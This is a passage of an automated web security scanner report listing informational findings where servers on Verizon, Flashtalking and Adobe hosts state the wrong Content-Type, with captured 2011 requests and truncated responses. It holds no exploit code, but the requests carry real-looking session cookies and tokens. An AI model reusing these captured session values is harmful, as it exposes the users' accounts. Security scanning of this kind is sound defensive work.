Path:	/images_b2c/flash_containers/hpMarquee/fonts/apex.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /images_b2c/flash_containers/hpMarquee/fonts/apex.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:24:54 GMT
Content-Length: 37874
ETag: "93f2-4c8a77f6"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:45 GMT
Connection: close

CWS ....x...y8.m.7.s..Z(.R).YK.H..X..k.1c2.\R..RJ."2-.B."..J.hTq.......v...~...~........;~..?>.............k(.Pw.. ..M..'...rh.l*..r..i..M2...?X.m....................VCCCIYEIEE.%......D(..KKm..U..G.[
...[SNIP]...

26.5. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/fonts/superscript.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/fonts/superscript.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /images_b2c/flash_containers/hpMarquee/fonts/superscript.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:24:54 GMT
Content-Length: 18168
ETag: "46f8-4c8a77f6"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:46 GMT
Connection: close

CWS .u..x... \.I.>|.. .D...YB ..*(...o.!.= . ......Q...Y].lDP6.QT.mpE\....mPP.........i.{f....7sg..~c....S..:..o.N..,.Q....8......._....D
..D-..L.....(..e............s.b....."..X$F%'.]./J..9;.jN"].R.
...[SNIP]...

26.6. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

Response

26.7. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/images/business/biz_tablets_072511.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

Response

26.8. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/images/business/global_business_072511.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

Response

26.9. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/images/business/gopayments_082511.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

Response

26.10. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/images/business/latestdevices_071911.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

Response

26.11. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
Path:	/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html?tab=business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:24:54 GMT
Content-Length: 18731
ETag: "492b-4c8a77f6"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:44 GMT
Connection: close

CWS ....x....|.E.7..>M..".$NW.b'F....r@.!N!..4r...#Y..nXr
.wN ......@(......fI...v.q.Q.......b'..{...'...........>.L....$....qL:..!I.\>00.s..E&-..[....4`8..I.!....,...jm..[.K.J......NiY....Mh..z....a.
...[SNIP]...

26.12. http://cache.vzw.com/images_b2c/homepage/biz_marquee_verticals.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
Path:	/images_b2c/homepage/biz_marquee_verticals.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

Response

26.13. http://cache.vzw.com/testNtarget/thin_omninav2.0.4.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cache.vzw.com
Path:	/testNtarget/thin_omninav2.0.4.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /testNtarget/thin_omninav2.0.4.js HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA

Response

HTTP/1.1 200 OK
Server: None
Content-Type: application/x-javascript
Last-Modified: Thu, 12 May 2011 12:23:26 GMT
ETag: "2dc9-4dcbd13e"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 11721
Date: Mon, 05 Sep 2011 22:14:48 GMT
Connection: close

O="context.checkS.match.part.if(.et.results.){var .Sizzl.expr.ele.){..length.functi.Expr..type.===.;}.for(var.r.urn .isXML..on(.[i].re.curLoop.s.ctor.ilter.heck.ode.tr.isPartS..nQTyp.=null.else.und...
...[SNIP]...

26.14. http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.flashtalking.com
Path:	/container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js HTTP/1.1
Host: cdn.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=fiost917;ord=789927707519.3822?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 21:30:24 GMT
Server: AmazonS3
Content-Type: text/plain
Last-Modified: Fri, 12 Aug 2011 11:21:40 GMT
ETag: "a03a4bb695d6236eb304ab091c3bbfa8"
x-amz-id-2: DHsRdUKVYST6JqEHqCGOa/F3IASvQ9gMhTo8+j6nLRsFT7GNkVMtVTiD+AHf8mq7
x-amz-request-id: BB35E40DC6E81580
Age: 2889
Via: HTTP/1.1 cdn.flashtalking.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Mon, 05 Sep 2011 22:30:24 GMT
Cache-Control: max-age=3600
Via: 1.1 bos107105 (MII-APC/2.1)
x-mii-cache-hit: 1
Content-Length: 1892

//9-8-2011

document.write("<script id='segmentHolder' type='text/javascript' onload='segmentLoadFunc()' src='http://servedby.flashtalking.com/segment/read/;;javascript/?test'></script>");
segment
...[SNIP]...

26.15. http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.flashtalking.com
Path:	/container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js HTTP/1.1
Host: cdn.flashtalking.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: flashtalkingad1="GUID=13153E27A6C6C8"

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 21:38:43 GMT
Server: AmazonS3
Content-Type: text/plain
Last-Modified: Fri, 12 Aug 2011 11:21:54 GMT
ETag: "5c56796626f1219d6805f04d41bfea9f"
x-amz-id-2: V4mVXqWtv+ViAxQHwVq+wMlBhT4tB4OVZsTBmpQkHGt05XOjtqu8mjErydc/B7VQ
x-amz-request-id: 88CCB459978E4F75
Age: 2156
Via: HTTP/1.1 cdn.flashtalking.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Mon, 05 Sep 2011 22:38:43 GMT
Cache-Control: max-age=3600
Via: 1.1 bos107106000000 (MII-APC/2.1)
x-mii-cache-hit: 1
Content-Length: 1898

//9-8-2011

document.write("<script id='segmentHolder' type='text/javascript' onload='segmentLoadFunc()' src='http://servedby.flashtalking.com/segment/read/;;javascript/?test'></script>");
segment
...[SNIP]...

26.16. https://collaborateext.verizon.com/aims/encore/VZCTC.serv previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://collaborateext.verizon.com
Path:	/aims/encore/VZCTC.serv

Issue detail

The response contains the following Content-type statement:

Content-type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /aims/encore/VZCTC.serv HTTP/1.1
Host: collaborateext.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:44 GMT
Content-length: 35
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1

Invalid Request

26.17. https://collaborateext.verizon.com/pre/pre/pre.serv previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://collaborateext.verizon.com
Path:	/pre/pre/pre.serv

Issue detail

The response contains the following Content-type statement:

Content-type: image/jpeg, image/gif

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /pre/pre/pre.serv?url=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount&title=Sign%20In&topWinTitle=&id=7546147205&cmdName=FiosOR7001&cookie=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1%21-1788495886%21154656592&stage=start&lastAction=none&timestamp=1315280303185&aimsHostVars=aimsChatCreditFlow__-1&referrer=https%3A//collaborateext.verizon.com/aims/encore/VzVAgent.jsp%3FuserId%3DEncoreSESS-EXT-PRODUCTION88049%26encUserId%3DGUmEyiQO9Y8UAztLasJjclKjsdj1czmHQ4i+eXEUNLY%3D HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preltvst=274600320~50.23.123.106~1315261452974; TMP_CK_AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971; NSC_dpmmbcfyuqsf_mcw=ffffffff8f64125045525d5f4f58455e445a4a422995; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:38:22 GMT
Content-length: 807
Content-type: image/jpeg, image/gif
Cache-Control: no-cache
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1

GIF87a.....................................@ .` .. .. .. .. ..@. @.@@.`@..@..@..@..@..`. `.@`.``..`..`..`..`.... ..@..`................. ..@..`................. ..@..`................. ..@..`.........
...[SNIP]...

26.18. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

Response

26.19. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

Response

26.20. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

Response

26.21. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

Response

26.22. http://get.adobe.com/cfusion/search/buddy/searchbuddy.cfm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://get.adobe.com
Path:	/cfusion/search/buddy/searchbuddy.cfm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

Response

26.23. http://get.adobe.com/cfusion/search/index.cfm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://get.adobe.com
Path:	/cfusion/search/index.cfm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /cfusion/search/index.cfm?loc=en_us&term=xss HTTP/1.1
Host: get.adobe.com
Proxy-Connection: keep-alive
Referer: http://get.adobe.com/flashplayer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SETTINGS.LOCALE=en%5Fus; storeregion=; s_vi=[CS]v1|272F173A85013C4B-60000106C0356B2B[CE]; UID=408BD657%2DBBDF%2DB561%2D47843A1059325B5B; op537volumelicensinggum=a00c02502m278vr07v3a22278vr08138v87c9; AWID=172.26.150.8.1314799484806; company_history=%5B%5B%22http%3A//support.muse.adobe.com/muse%22%2C%22Muse%22%5D%5D; is_human=true; mbox=PC#1314797047557-324714.19#1316024271|session#1314813238023-632011#1314816531|disable#browser%20timeout#1314817080|check#true#1314814731; s_cc=true; fsr.s={"v":1,"rid":"1315279224659_929552","ru":"http://phones.verizonwireless.com/htc/thunderbolt/","r":"phones.verizonwireless.com","st":"","cp":{"downloads":"get"},"pv":2,"to":3.3,"c":"http://get.adobe.com/flashplayer/","lc":{"d0":{"v":2,"s":true,"e":2}},"cd":0,"sd":0,"f":1315279228499}; DylanApp-BigIP=1447851018.27680.0000; s_sq=mxmacromedia%3D%2526pid%253Dget.adobe.com%25253A%252520Flash%252520Player%25253A%252520en%25253A%252520Chrome%252520message%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fget.adobe.com%25252Fcfusion%25252Fsearch%25252Findex.cfm%25253Floc%25253Den_us%252526term%25253Dxss%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 22:20:38 GMT
Server: JRun Web Server
Content-Type: text/html; charset=UTF-8
Content-Length: 23494

        <div class="columns-2-aaB-aa center"><img src="http://wwwimages.adobe.com/www.adobe.com/images/shared/error_sm.gif" width="95" height="90" alt="Error" /></div>
        <div class="columns-2-aaB-B">

...[SNIP]...
<head>

               <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

       <meta http-equiv="Content-Language" content="en-us" />
...[SNIP]...

26.24. http://headlines.verizon.com/headlines/GetPoll previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/GetPoll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /headlines/GetPoll?action=checkVote&pollId=575 HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381; CP=null*; VISITORID=1597650297

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Length: 84
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:57 GMT
Connection: close
Vary: Accept-Encoding

{"response":{"status":"success","poll_choice":{"type":"poll_choice","null":"true"}}}

26.25. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/Core.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/js/com/bea/portal/tools/js/Core.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.26. http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

26.27. http://headlines.verizon.com/headlines/resources/images/featuredArticle.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/featuredArticle.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

26.28. http://headlines.verizon.com/headlines/resources/images/followUsOnTwitter.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/followUsOnTwitter.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

26.29. http://headlines.verizon.com/headlines/resources/images/navOff_02.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_02.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

26.30. http://headlines.verizon.com/headlines/resources/images/navOff_03.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_03.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 543
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...:............e....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.m.0............d..!....#.#.+..G(#..^zY$...*./Y.......Q..R..../b.h&...o{...u]..0..cK]Em...........V..
...[SNIP]...

26.31. http://headlines.verizon.com/headlines/resources/images/navOff_04.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_04.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 556
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...B.........tKJ ....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.m.@.M..@G...
d.2B..F......a.0B....>K....i../[....?xg.`....i.zs......p ...3..,......p.M..Z3.{.g.....t#
...[SNIP]...

26.32. http://headlines.verizon.com/headlines/resources/images/navOff_05.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://headlines.verizon.com
Path:	/headlines/resources/images/navOff_05.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 574
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...;.........~..[....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..V.m. ..U..#..................f.FhV`...zD'....O.....q......zU.........-`.W{_........{'..}...l!.w[#..mG..
...[SNIP]...
